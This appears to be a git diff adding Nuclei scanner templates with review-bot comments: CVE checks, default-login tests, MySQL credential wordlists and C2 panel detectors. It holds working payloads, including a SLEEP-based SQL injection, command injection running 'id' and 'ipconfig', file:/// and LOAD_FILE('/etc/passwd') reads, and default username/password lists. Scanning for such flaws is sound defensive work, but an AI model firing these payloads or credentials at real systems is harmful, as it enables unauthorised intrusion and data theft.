diff --git a/helpers/wordlists/mysql-passwords.txt b/helpers/wordlists/mysql-passwords.txt
new file mode 100644
index 0000000000..c514e405ad
--- /dev/null
+++ b/helpers/wordlists/mysql-passwords.txt
@@ -0,0 +1,19 @@
+mysql
+root
+chippc
+admin
+nagiosxi
+usbw
+cloudera
+moves
+testpw
+p@ck3tf3nc3
+medocheck123
+mktt
+123
+amp109
+eLaStIx.asteriskuser.2oo7
+raspberry
+openauditrootuserpassword
+vagrant
+123qweASD#
\ No newline at end of file
diff --git a/helpers/wordlists/mysql-users.txt b/helpers/wordlists/mysql-users.txt
new file mode 100644
index 0000000000..37e33b4a7e
--- /dev/null
+++ b/helpers/wordlists/mysql-users.txt
@@ -0,0 +1,7 @@
+root
+admin
+cloudera
+moves
+mcUser
+dbuser
+asteriskuser
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-6114.yaml b/http/cves/2023/CVE-2023-6114.yaml
new file mode 100644
index 0000000000..cf5fc0bef7
--- /dev/null
+++ b/http/cves/2023/CVE-2023-6114.yaml
@@ -0,0 +1,37 @@
+id: CVE-2023-6114
+
+info:
+ name: Duplicator < 1.5.7.1; Duplicator Pro < 4.5.14.2 - Unauthenticated Sensitive Data Exposure
+ author: DhiyaneshDk
+ severity: high
+ description: |
+ The Duplicator WordPress plugin before 1.5.7.1, Duplicator Pro WordPress plugin before 4.5.14.2 does not disallow listing the `backups-dup-lite/tmp` directory (or the `backups-dup-pro/tmp` directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to discover and access these sensitive files, which include a full database dump and a zip archive of the site.
+ remediation: Duplicator Fixed in 1.5.7.1,Duplicator-Pro Fixed in 4.5.14.2.
+ reference:
+ - https://drive.google.com/file/d/1mpapFCqfZLv__EAM7uivrrl2h55rpi1V/view?usp=sharing
+ - https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-6114
+ - https://wpscan.com/plugin/duplicator/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2023-6114
+ cwe-id: CWE-552
+ epss-score: 0.00145
+ epss-percentile: 0.50326
+ cpe: cpe:2.3:a:awesomemotive:duplicator:*:*:*:*:-:wordpress:*:*
+ tags: cve,cve2023,duplicator,duplicator-pro,lfi,wpscan,wordpress,wp-plugin,wp
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/backups-dup-lite/tmp/"
+ - "{{BaseURL}}/wp-content/backups-dup-pro/tmp/"
+
+ stop-at-first-match: true
+ matchers:
+ - type: dsl
+ dsl:
+ - "status_code == 200"
+ - "contains(body, '/tmp') && contains(body, '
Index of')"
+ condition: and
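Review bot: The second DSL expression at the end of the hunk appears as `contains(body, '/tmp') && contains(body, '` with the remainder `Index of')"` on an unmarked following line; inside a double-quoted YAML scalar that break would fold to a space, so either the committed line is intact and this is a rendering artifact, or the matcher looks for ` Index of` — confirm the line is a single scalar before merge. The `info` block also has no `metadata` at all, while the sibling CVE-2023-6567 template in this commit carries `max-request`; with two paths add `metadata:` with `max-request: 2` and `verified: true` if it was tested. The `remediation` value `Duplicator Fixed in 1.5.7.1,Duplicator-Pro Fixed in 4.5.14.2.` reads better as `Update Duplicator to 1.5.7.1 or Duplicator Pro to 4.5.14.2.`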
diff --git a/http/cves/2023/CVE-2023-6567.yaml b/http/cves/2023/CVE-2023-6567.yaml
new file mode 100644
index 0000000000..f9e5eaf434
--- /dev/null
+++ b/http/cves/2023/CVE-2023-6567.yaml
@@ -0,0 +1,33 @@
+id: CVE-2023-6567
+
+info:
+ name: LearnPress <= 4.2.5.7 - SQL Injection
+ author: iamnoooob,rootxharsh,pdresearch
+ severity: critical
+ description: |
+ The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'order_by' parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ remediation: Fixed in version 4.2.5.8
+ reference:
+ - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-4257-unauthenticated-sql-injection-via-order-by
+ - https://wpscan.com/vulnerability/c5110450-3b4e-4100-8db4-0d7f5d43c12f/
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-6567
+ classification:
+ cve-id: CVE-2023-6567
+ metadata:
+ max-request: 1
+ verified: true
+ publicwww-query: "/wp-content/plugins/learnpress"
+ tags: cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'contains_all(header, "lp_session_guest=", "application/json")'
+ - 'contains_all(body, "status\":\"success", "No courses were found")'
+ condition: and
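Review bot: `classification` carries only `cve-id`, whereas CVE-2023-6114 in the same commit fills in `cvss-metrics`, `cvss-score`, `cwe-id`, `epss-score` and `cpe`; add at least `cwe-id: CWE-89` and the NVD CVSS vector so the two templates are scored consistently. The timing signal is a single `duration>=6` on one request, so a slow or rate-limited host can exceed six seconds without any injection; the header and body conditions narrow that but do not remove it, and the description should say the check is time-based so operators can weigh a hit accordingly.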
diff --git a/http/cves/2023/CVE-2023-6895.yaml b/http/cves/2023/CVE-2023-6895.yaml
index b1fdac14f0..69da102528 100644
--- a/http/cves/2023/CVE-2023-6895.yaml
+++ b/http/cves/2023/CVE-2023-6895.yaml
@@ -1,24 +1,21 @@
id: CVE-2023-6895
info:
- name: Hikvision Intercom Broadcasting System - Command Execution
- author: archer
+ name: Hikvision IP ping.php - Command Execution
+ author: DhiyaneshDk,archer
severity: critical
description: |
- Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.
+ A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.
reference:
- - https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py
- https://vuldb.com/?ctiid.248254
- https://vuldb.com/?id.248254
- - https://github.com/Marco-zcl/POC
- - https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-6895
cwe-id: CWE-78
epss-score: 0.0008
- epss-percentile: 0.32716
+ epss-percentile: 0.33389
cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:*
metadata:
verified: true
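Review bot: The replacement description is the VulDB entry verbatim ("affects unknown code of the file", "The exploit has been disclosed to the public and may be used", "VDB-248254 is the identifier assigned to this vulnerability"), which is advisory boilerplate rather than a description of what the template checks; the removed sentence stated the root cause more directly. Keep the new fixed-version information but trim to something like `Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) has an OS command injection via the jsondata[ip] parameter of /php/ping.php; fixed in version 4.1.0.` The file header stays outside this hunk.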
@@ -26,31 +23,35 @@ info:
vendor: hikvision
product: intercom_broadcast_system
fofa-query: icon_hash="-1830859634"
- tags: cve,cve2023,rce,hikvision
+ tags: cve,cve2023,hikvision,rce
http:
- - raw:
- - |
- POST /php/ping.php HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
- X-Requested-With: XMLHttpRequest
+ - method: POST
+ path:
+ - "{{BaseURL}}/php/ping.php"
+ body: "jsondata%5Btype%5D=99&jsondata%5Bip%5D={{command}}"
+ headers:
+ Content-Type: "application/x-www-form-urlencoded"
- jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}}
+ payloads:
+ command:
+ - 'id'
+ - 'cmd /c ipconfig'
matchers-condition: and
matchers:
- - type: word
- part: interactsh_protocol
- words:
- - "dns"
+ - type: regex
+ part: body
+ regex:
+ - "Windows IP"
+ - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
+ condition: or
- type: word
- part: body
+ part: header
words:
- - "TTL="
+ - "text/html"
- type: status
status:
- 200
-# digest: 490a00463044022046e9673fbb222a36f6113e7f32e176bc2d800d2a0f8fb0824bc84dd30705c4fa022051992f8ba2020e9c09b574c69ecbca8b48a5d98fda9f790dd46ba0313ebb08bb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
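Review bot: The rewritten request executes the injected command on the target and checks its output in-band (`payloads.command` with the `id`/`Windows IP` regexes), whereas the removed version only triggered an out-of-band DNS callback, yet no `intrusive` tag was added and `metadata` still has no `max-request`; operators exclude templates by that tag, so add `intrusive` to `tags` and `max-request: 2` (one request per payload). The first regex `Windows IP` is short enough to match unrelated HTML, so the `or` is mostly carried by the status and `text/html` matchers — use a longer, more specific fragment of the expected output to keep false positives down. Dropping the `# digest:` trailer is expected for a modified template; note that `info` starts in the previous hunk.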
diff --git a/http/default-logins/ispconfig-default-login.yaml b/http/default-logins/ispconfig-default-login.yaml
new file mode 100644
index 0000000000..e3cf05065c
--- /dev/null
+++ b/http/default-logins/ispconfig-default-login.yaml
@@ -0,0 +1,61 @@
+id: ispconfig-default-login
+
+info:
+ name: ISPConfig - Default Password
+ author: pussycat0x
+ severity: high
+ description: |
+ ISPConfig Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
+ metadata:
+ verified: true
+ shodan-query: http.title:"ispconfig"
+ tags: default-login,ispconfig
+
+http:
+ - raw:
+ - |
+ GET /lgoin HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /login/index.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Origin: {{BaseURL}}
+ Connection: close
+ Referer: {{RootURL}}/login/
+
+ username={{username}}&password={{password}}&s_mod=login&s_pg=index
+
+ - |
+ GET /sites/web_vhost_domain_list.php HTTP/1.1
+ Host: {{Hostname}}
+ X-Requested-With: XMLHttpRequest
+ Referer: {{RootURL}}/index.php
+
+ attack: pitchfork
+ payloads:
+ username:
+ - 'admin'
+ - 'guest'
+ - 'root'
+ password:
+ - 'admin'
+ - 'password'
+ - 'toor'
+
+ stop-at-first-match: true
+ host-redirects: true
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body_3
+ words:
+ - Tools
+ - Websites
+ condition: and
+
+ - type: status
+ status:
+ - 200
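Review bot: The first raw request is `GET /lgoin HTTP/1.1`, which looks like a typo for `/login`; because only `body_3` is matched the wrong path goes unnoticed, but the request is wasted and, if it was meant to seed a session cookie for the POST, the login step runs without one. `metadata` lacks `max-request: 3`, and since `attack: pitchfork` zips the lists positionally (admin/admin, guest/password, root/toor) rather than combining them, a one-line comment above `payloads` saying the pairing is intentional will stop the next reader from "fixing" it. The description should also say what the finding is, e.g. `ISPConfig panel accepts a well-known default username/password pair.`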
diff --git a/http/exposed-panels/c2/ares-rat-c2.yaml b/http/exposed-panels/c2/ares-rat-c2.yaml
new file mode 100644
index 0000000000..60ae43df94
--- /dev/null
+++ b/http/exposed-panels/c2/ares-rat-c2.yaml
@@ -0,0 +1,33 @@
+id: ares-rat-c2
+
+info:
+ name: Area Rat C2 - Detect
+ author: pussycat0x
+ severity: info
+ description: |
+ Ares is a Python Remote Access Tool.
+ reference:
+ - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: product:'Ares RAT C2'
+ tags: c2,ir,osint,ares,panel,rat
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'Ares'
+ - 'Passphrase:'
+ condition: and
+
+ - type: status
+ status:
+ - 200
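Review bot: `name: Area Rat C2 - Detect` misspells the product; the id, tags, description and `shodan-query` all say Ares, so use `name: Ares RAT C2 - Detect`. The description `Ares is a Python Remote Access Tool.` could add one clause on what is detected, e.g. `; this template finds its exposed login page (the Passphrase prompt).`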
diff --git a/http/exposed-panels/c2/caldera-c2.yaml b/http/exposed-panels/c2/caldera-c2.yaml
new file mode 100644
index 0000000000..d2e0c7a0cb
--- /dev/null
+++ b/http/exposed-panels/c2/caldera-c2.yaml
@@ -0,0 +1,32 @@
+id: caldera-c2
+
+info:
+ name: Caldera C2 - Detect
+ author: pussycat0x
+ severity: info
+ description: |
+ MITRE Caldera™ is a cyber security platform designed to easily automate adversary emulation, assist manual red-teams, and automate incident response.
+ reference:
+ - https://github.com/mitre/caldera
+ - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: http.favicon.hash:-636718605
+ tags: c2,ir,osint,caldera,panel
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'Login | CALDERA'
+
+ - type: status
+ status:
+ - 200
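Review bot: `fofa-query: http.favicon.hash:-636718605` is Shodan filter syntax — FOFA's icon filter is written `icon_hash="..."`, as the supershell-c2 template in this commit does — so either the key should be `shodan-query` or the query rewritten for FOFA. MITRE Caldera is also a legitimately deployed adversary-emulation platform, so a short note in the description that the finding is an internet-exposed login page, not the product itself, will help triage.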
diff --git a/http/exposed-panels/c2/hack5-cloud-c2.yaml b/http/exposed-panels/c2/hack5-cloud-c2.yaml
new file mode 100644
index 0000000000..e40038d588
--- /dev/null
+++ b/http/exposed-panels/c2/hack5-cloud-c2.yaml
@@ -0,0 +1,31 @@
+id: hack5-cloud-c2
+
+info:
+ name: Hack5 Cloud C2 - Detect
+ author: pussycat0x
+ severity: info
+ description: |
+ Cloud C² is a self-hosted web-based command and control suite for networked Hak5 gear that lets you pentest from anywhere. Linux, Mac and Windows computers can host the Cloud C² server while Hak5 gear such as the WiFi Pineapple, LAN Turtle and Packet Squirrel can be provisioned as clients.
+ reference:
+ - https://twitter.com/fofabot/status/1742737671037091854
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: app="Hak5-C2"
+ tags: c2,ir,osint,hack5c2,panel
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'Hak5 Cloud C²'
+
+ - type: status
+ status:
+ - 200
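Review bot: The id, name and tag spell the vendor `Hack5` (`hack5-cloud-c2`, `Hack5 Cloud C2 - Detect`, `hack5c2`) while the description, `fofa-query` and the matched string all say `Hak5`; since the id is also the filename, fix it before merge (`hak5-cloud-c2`, `Hak5 Cloud C2 - Detect`, tag `hak5c2`). The description is vendor marketing copy ("lets you pentest from anywhere") — trim it to what the template relies on, the Cloud C² login page banner.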
diff --git a/http/exposed-panels/c2/pupyc2.yaml b/http/exposed-panels/c2/pupyc2.yaml
new file mode 100644
index 0000000000..b4194d8f88
--- /dev/null
+++ b/http/exposed-panels/c2/pupyc2.yaml
@@ -0,0 +1,32 @@
+id: pupyc2
+
+info:
+ name: PupyC2 - Detect
+ author: pussycat0x
+ severity: info
+ description: |
+ Pupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in python. It features an all-in-memory execution guideline and leaves a very low footprint. Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory.
+ reference:
+ - https://twitter.com/TLP_R3D/status/1654038602282565632
+ - https://github.com/n1nj4sec/pupy
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: aa3939fc357723135870d5036b12a67097b03309
+ tags: c2,ir,osint,pupyc2,panel
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - 'Etag: "aa3939fc357723135870d5036b12a67097b03309"'
+
+ - type: status
+ status:
+ - 200
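Review bot: `shodan-query: aa3939fc357723135870d5036b12a67097b03309` is a bare value with no filter name, unlike every other query in this commit, so it cannot be reproduced; spell out the filter that this ETag is searched under. The word matcher looks for `Etag: "..."` verbatim, and header-name capitalisation varies between servers (`ETag` vs `Etag`), so either add `case-insensitive: true` to the matcher or match only the quoted value `"aa3939fc357723135870d5036b12a67097b03309"`.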
diff --git a/http/exposed-panels/c2/supershell-c2.yaml b/http/exposed-panels/c2/supershell-c2.yaml
new file mode 100644
index 0000000000..131e9e2d39
--- /dev/null
+++ b/http/exposed-panels/c2/supershell-c2.yaml
@@ -0,0 +1,33 @@
+id: supershell-c2
+
+info:
+ name: Supershell C2 - Detect
+ author: pussycat0x
+ severity: info
+ description: |
+ Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel, a fully interactive shell can be obtained, and it supports multi-platform architecture Payload.
+ reference:
+ - https://twitter.com/S4nsLimit3/status/1693619836339859497
+ - https://github.com/tdragon6/Supershell/blob/main/README_EN.md
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: icon_hash="-1010228102"
+ tags: c2,ir,osint,supershell,panel
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ host-redirects: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'Supershell - 登录'
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml b/http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml
new file mode 100644
index 0000000000..5d92c138af
--- /dev/null
+++ b/http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml
@@ -0,0 +1,36 @@
+id: esafenet-mysql-fileread
+
+info:
+ name: Esafenet CDG mysql - File Read
+ author: DhiyaneshDk
+ severity: high
+ description: |
+ CDGServer3 Unauthorized File Download vulnerability is detected.
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: title="电子文档安全管理系统"
+ tags: esafenet,lfi,mysql
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/CDGServer3/SQL/MYSQL/create_SmartSec_mysql.sql"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "varchar"
+ - "create table"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "application/x-sql"
+
+ - type: status
+ status:
+ - 200
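Review bot: The description `CDGServer3 Unauthorized File Download vulnerability is detected.` does not say what is exposed; the request fetches the schema script `create_SmartSec_mysql.sql` from the web root, so state that, e.g. `The CDGServer3 web root serves the SmartSec MySQL schema script (create_SmartSec_mysql.sql) without authentication.` The `mysql` tag will group this HTTP template with the MySQL service templates under `javascript/` added in the same commit; `esafenet,exposure` (or just `esafenet,lfi`) fits better.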
diff --git a/http/vulnerabilities/idoc/idocview-2word-fileupload.yaml b/http/vulnerabilities/idoc/idocview-2word-fileupload.yaml
new file mode 100644
index 0000000000..28fdcefb12
--- /dev/null
+++ b/http/vulnerabilities/idoc/idocview-2word-fileupload.yaml
@@ -0,0 +1,30 @@
+id: idocview-2word-fileupload
+
+info:
+ name: IDoc View /html/2word - Arbitrary File Upload
+ author: DhiyaneshDK
+ severity: high
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: title=="在线文档预览 - I Doc View"
+ tags: idoc,rce,instrusive,file-upload
+
+variables:
+ file: "{{to_lower(rand_text_alpha(5))}}"
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/html/2word?url={{file}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: response
+ words:
+ - "{{md5(file)}}.docx"
+
+ - type: status
+ status:
+ - 200
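Review bot: `tags: idoc,rce,instrusive,file-upload` misspells `intrusive`; operators exclude intrusive templates by exact tag, so the typo means this upload template still runs in scans that opted out — the one place where a tag typo has operational cost. There is no `description` (the sibling idocview-lfi.yaml has none either); add one sentence on what `/html/2word?url=` does with the supplied name and that the md5-named `.docx` in the response is what confirms the upload (presumably — state it from the verified run).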
diff --git a/http/vulnerabilities/idoc/idocview-lfi.yaml b/http/vulnerabilities/idoc/idocview-lfi.yaml
new file mode 100644
index 0000000000..12ac44a85d
--- /dev/null
+++ b/http/vulnerabilities/idoc/idocview-lfi.yaml
@@ -0,0 +1,37 @@
+id: idocview-lfi
+
+info:
+ name: IDoc View - Arbitrary File Read
+ author: DhiyaneshDK
+ severity: high
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: title=="在线文档预览 - I Doc View"
+ tags: idoc,lfi,file-read
+
+variables:
+ file: "{{to_lower(rand_text_alpha(5))}}"
+
+http:
+
+ - method: GET
+ path:
+ - "{{BaseURL}}/doc/upload?token=testtoken&url=file:///C:/windows/win.ini&name={{file}}.txt"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code == 200
+ - contains(content_type, 'application/json')
+ - contains_all(body, "ext", "srcUrl", "success", "md5")
+ condition: and
+
+ extractors:
+ - type: regex
+ part: body
+ internal: true
+ name: filepath
+ group: 1
+ regex:
+ - '"srcUrl":"\/([a-z/0-9_.]+)"'
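Review bot: The extractor is `internal: true` and named `filepath`, but nothing consumes it — there is a single request and no later `{{filepath}}` reference — so the captured path reaches neither the user nor a follow-up step; either drop `internal: true` so the path is reported, or remove the extractor. The name says "Arbitrary File Read" while the matcher only confirms the JSON success envelope (`ext`, `srcUrl`, `success`, `md5`) and never checks any win.ini content, so the description (currently absent) should say the conversion endpoint accepted a `file:///` URL and returned a server-side path. `http:` is followed by a stray blank line before the first request.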
diff --git a/http/vulnerabilities/other/office365-indexs-fileread.yaml b/http/vulnerabilities/other/office365-indexs-fileread.yaml
new file mode 100644
index 0000000000..ebb3013d26
--- /dev/null
+++ b/http/vulnerabilities/other/office365-indexs-fileread.yaml
@@ -0,0 +1,36 @@
+id: office365-indexs-fileread
+
+info:
+ name: OfficeWeb365 Indexs Interface - Arbitary File Read
+ author: DhiyaneshDK
+ severity: high
+ description: |
+ There is any file reading in the officeWeb365 Indexs interface.
+ reference:
+ - https://github.com/wy876/POC/blob/main/OfficeWeb365_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: "OfficeWeb365"
+ tags: officeweb365,lfi
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "for 16-bit app support"
+
+ - type: word
+ part: body
+ words:
+ - "image/png"
+
+ - type: status
+ status:
+ - 200
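Review bot: The id `office365-indexs-fileread` names Microsoft's Office 365 while the product is OfficeWeb365 (per `name`, `shodan-query` and the tag), and the id is also the filename, so rename to `officeweb365-indexs-fileread` before merge to avoid misfiled findings. `name` has a typo, `Arbitary` → `Arbitrary`, and the description `There is any file reading in the officeWeb365 Indexs interface.` should read `The OfficeWeb365 /Pic/Indexs endpoint reads arbitrary local files via the imgs parameter.` The two `part: body` word matchers can be a single matcher with both words and `condition: and`.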
diff --git a/javascript/audit/mysql/mysql-load-file.yaml b/javascript/audit/mysql/mysql-load-file.yaml
new file mode 100644
index 0000000000..cede045998
--- /dev/null
+++ b/javascript/audit/mysql/mysql-load-file.yaml
@@ -0,0 +1,57 @@
+id: mysql-load-file
+info:
+ name: MySQL LOAD_FILE - Enable
+ author: pussycat0x
+ severity: high
+ description: |
+ The LOAD_FILE function in MySQL is potentially dangerous if not used carefully, as it can pose security risks. The function is designed to read the contents of a file on the server and return the file contents as a string. However, it can be exploited if not properly restricted or sanitized, leading to security vulnerabilities.
+ reference:
+ - https://nmap.org/nsedoc/scripts/mysql-databases.html
+ metadata:
+ shodan-query: port:3306
+ verified: true
+ tags: js,mysql,network,audit
+
+javascript:
+ - code: |
+ let m = require('nuclei/mysql');
+ let c = m.MySQLClient();
+ let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
+ Export(response);
+
+ args:
+ Host: "{{Host}}"
+ Port: "3306"
+ Query: SELECT LOAD_FILE('/etc/passwd')
+ User: "{{usernames}}"
+ Pass: "{{passwords}}"
+
+ payloads:
+ usernames:
+ - root
+ - admin
+ - mysql
+ - test
+ passwords:
+ - root
+ - admin
+ - mysql
+ - test
+ attack: clusterbomb
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - success == true
+
+ - type: word
+ words:
+ - "root:x:"
+
+ extractors:
+ - type: json
+ part: response
+ json:
+ - .Rows[]
\ No newline at end of file
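Review bot: A match means `LOAD_FILE('/etc/passwd')` returned content, i.e. the guessed account holds the FILE privilege and `secure_file_priv` does not restrict reads, but neither the description nor a `remediation` key says so; add `remediation: Revoke the FILE privilege from application accounts and set secure_file_priv to NULL or a dedicated directory.` `name: MySQL LOAD_FILE - Enable` should be `Enabled`. The 4×4 username/password lists are duplicated here and in mysql-show-databases, mysql-show-variables and mysql-user-enum, while the commit adds `helpers/wordlists/mysql-users.txt` and `mysql-passwords.txt` that no template references — either point the payloads at those files or drop the unused wordlists. `metadata` has no `max-request` (16 combinations), and the file lacks a trailing newline.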
diff --git a/javascript/enumeration/mysql/mysql-default-login.yaml b/javascript/enumeration/mysql/mysql-default-login.yaml
new file mode 100644
index 0000000000..f5b5535048
--- /dev/null
+++ b/javascript/enumeration/mysql/mysql-default-login.yaml
@@ -0,0 +1,50 @@
+id: mysql-default-login
+
+info:
+ name: MySQL - Default Login
+ author: DhiyaneshDk,pussycat0x,ritikchaddha
+ severity: high
+ description: |
+ A MySQL service was accessed with easily guessed credentials.
+ metadata:
+ shodan-query: port:3306
+ verified: true
+ tags: js,mysql,default-login,network,fuzz
+
+javascript:
+ - pre-condition: |
+ var m = require("nuclei/mysql");
+ var c = m.MySQLClient();
+ c.IsMySQL(Host, Port);
+
+ code: |
+ var m = require("nuclei/mysql");
+ var c = m.MySQLClient();
+ c.Connect(Host,Port,Username,Password)
+
+ args:
+ Host: "{{Host}}"
+ Port: "3306"
+ User: "{{usernames}}"
+ Pass: "{{passwords}}"
+
+ payloads:
+ usernames:
+ - root
+ - admin
+ - mysql
+ - test
+ passwords:
+ - root
+ - admin
+ - mysql
+ - test
+ -
+ attack: clusterbomb
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "response == true"
+ - "success == true"
+ condition: and
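Review bot: `args` declares `User` and `Pass`, but the code calls `c.Connect(Host,Port,Username,Password)`, so `Username` and `Password` are undefined inside the script and the template never tests the values it was given (the other MySQL templates in this commit use `User`/`Pass` in both places); rename in the code or in `args`. The last `passwords` entry is a bare `-`, which YAML reads as null rather than the empty password — write `- ''` if an empty password is intended. `response == true` relies on the bare `c.Connect(...)` expression being the script's value; `Export(...)` as in the sibling templates makes that explicit. `metadata` has no `max-request` (4×5 combinations).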
diff --git a/javascript/enumeration/mysql/mysql-info.yaml b/javascript/enumeration/mysql/mysql-info.yaml
new file mode 100644
index 0000000000..5d90a8a098
--- /dev/null
+++ b/javascript/enumeration/mysql/mysql-info.yaml
@@ -0,0 +1,36 @@
+id: mysql-info
+
+info:
+ name: MySQL Info - Enumeration
+ author: pussycat0x
+ severity: info
+ description: |
+ Connects to a MySQL server and prints information such as the protocol and version numbers
+ reference:
+ - https://nmap.org/nsedoc/scripts/mysql-info.html
+ metadata:
+ shodan-query: port:3306
+ tags: js,mssql,network
+
+javascript:
+ - code: |
+ var m = require("nuclei/mysql");
+ var c = m.MySQLClient();
+ var response = c.FingerprintMySQL(Host,Port);
+ Export(response);
+
+ args:
+ Host: "{{Host}}"
+ Port: "3306"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "success == true"
+
+ extractors:
+ - type: json
+ json:
+ - '"Version: "+ .Version '
+ - '"TLS "+ .TLS'
+ - '"Transport: "+ .Transport '
\ No newline at end of file
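Review bot: `tags: js,mssql,network` lists `mssql` for a MySQL template (the siblings use `js,mysql,network,enum`), which mis-routes it in tag-based runs; change it to `mysql`. The extractor label `"TLS "+ .TLS` lacks the colon the other two labels have (`"TLS: "+ .TLS`), and the file has no trailing newline.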
diff --git a/javascript/enumeration/mysql/mysql-show-databases.yaml b/javascript/enumeration/mysql/mysql-show-databases.yaml
new file mode 100644
index 0000000000..b18a97008a
--- /dev/null
+++ b/javascript/enumeration/mysql/mysql-show-databases.yaml
@@ -0,0 +1,51 @@
+id: mysql-show-databases
+
+info:
+ name: MySQL - Show Databases
+ author: DhiyaneshDk
+ severity: high
+ reference:
+ - https://nmap.org/nsedoc/scripts/mysql-databases.html
+ metadata:
+ shodan-query: port:3306
+ verified: true
+ tags: js,mysql,network,enum
+
+javascript:
+ - code: |
+ let m = require('nuclei/mysql');
+ let c = m.MySQLClient();
+ let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
+ Export(response);
+
+ args:
+ Host: "{{Host}}"
+ Port: "3306"
+ Query: "show databases;"
+ User: "{{usernames}}"
+ Pass: "{{passwords}}"
+
+ payloads:
+ usernames:
+ - root
+ - admin
+ - mysql
+ - test
+ passwords:
+ - root
+ - admin
+ - mysql
+ - test
+ attack: clusterbomb
+
+ stop-at-first-match: true
+ matchers:
+ - type: dsl
+ dsl:
+ - "success == true"
+
+ extractors:
+ - type: json
+ part: response
+ json:
+ - .Rows[] | .Database
\ No newline at end of file
